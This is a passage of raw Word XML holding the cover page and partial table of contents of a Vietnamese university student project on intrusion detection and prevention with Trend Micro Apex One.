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FD8A" w14:textId="01472541" w:rsidR="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7CDB488E" w14:textId="2CA2DBA4" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>TRƯỜNG ĐẠI HỌC CÔNG NGHỆ THÔNG TIN</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="037B7962" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>KHOA MẠNG MÁY TÍNH VÀ TRUYỀN THÔNG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EC5994" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3035465A" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5F3EAF9F" wp14:editId="02E4416E">
            <wp:extent cx="2316681" cy="1859441"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:docPr id="1047915788" name="Picture 104791578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5788" name="Picture 1" descr="A blue and white logo&#10;&#10;Description automatically generated with low confidence"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId8"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2316681" cy="1859441"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="440CD80C" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="001656E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BC91668" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>ĐỒ ÁN MÔN HỌC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0703E149" w14:textId="5E4FF7F8" w:rsidR="001656E5" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Hệ thống Tìm kiếm, Phát hiện và Ngăn ngừa xâm nhập</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6D69A7" w14:textId="3A4D450C" w:rsidR="00E31ADF" w:rsidRPr="00516001" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00516001">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>Trend Micro Apex One</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7AE549" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BB1583" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Giảng viên hướng dẫn: ThS. Đỗ Hoàng Hiển</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5134FCF5" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78D92FF2" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Sinh viên thực hiện</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15FD4514" w14:textId="689B65F2" w:rsidR="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Lã Trọng Ánh – 20520132</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F652B3" w14:textId="5839ECEF" w:rsidR="00E31ADF" w:rsidRPr="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Vũ Vinh Hiển</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20520498</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44196ECA" w14:textId="27573932" w:rsidR="00E31ADF" w:rsidRPr="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nguyễn Thái Dương</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20520463</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56C05D5E" w14:textId="41436863" w:rsidR="00E31ADF" w:rsidRPr="00E31ADF" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nguyễn Trần Đức Anh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidRPr="00E31ADF">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>20520392</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78FC4A02" w14:textId="2D48EF8A" w:rsidR="00E31ADF" w:rsidRPr="000D3A47" w:rsidRDefault="001656E5" w:rsidP="001656E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000D3A47">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[NT204.O11.ATCL]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A1FC930" w14:textId="77777777" w:rsidR="001656E5" w:rsidRPr="001656E5" w:rsidRDefault="001656E5" w:rsidP="001656E5">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21A42FC8" w14:textId="1CFCEBAB" w:rsidR="00CA7E26" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Hồ Chí Minh, tháng </w:t>
      </w:r>
      <w:r w:rsidR="00C5149E">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>12</w:t>
      </w:r>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2023</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D64D8CC" w14:textId="77777777" w:rsidR="00E31ADF" w:rsidRPr="00801041" w:rsidRDefault="00E31ADF" w:rsidP="00E31ADF">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>MỤC LỤC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1016E918" w14:textId="18777061" w:rsidR="00DC4306" w:rsidRDefault="00E31ADF">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r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00801041">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:hyperlink w:anchor="_Toc152795822" w:history="1">
        <w:r w:rsidR="00DC4306" w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>I.</w:t>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DC4306" w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:noProof/>
          </w:rPr>
          <w:t>Cơ Sở Lý Thuyết</w:t>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795822 \h </w:instrText>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r w:rsidR="00DC4306">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="59F8F28B" w14:textId="171A723D"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23" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>1)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Tổng quan về EndPoint và Trend Micro Apex One</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795823 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="3E7D9A82" w14:textId="676D6193"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4" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>a.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Endpoint:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795824 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>3</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="739D4929" w14:textId="7CC7D29A"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5" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>b.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Trend Micro Apex One:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795825 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>4</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="740CA539" w14:textId="7BF48D80"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26" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:cs="Times New Roman"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>2)</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bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Các yêu cầu cho hệ thống Apex One</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795826 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="242B7B50" w14:textId="4EF913DD"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7" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>a.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Agent operating system:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:instrText xml:space="preserve"> PAGEREF _Toc152795827 \h </w:instrText>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="000B76DB">
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:t>5</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="end"/>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="33266C6D" w14:textId="601D156F"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8" w:history="1">
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>b.</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
            <w:noProof/>
            <w:kern w:val="2"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w14:ligatures w14:val="standardContextual"/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r w:rsidRPr="00CE3112">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
            <w:noProof/>
          </w:rPr>
          <w:t>Agent Platform:</w:t>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:tab/>
        </w:r>
        <w:r>
          <w:rPr>
            <w:noProof/>
            <w:webHidden/>
          </w:rPr>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
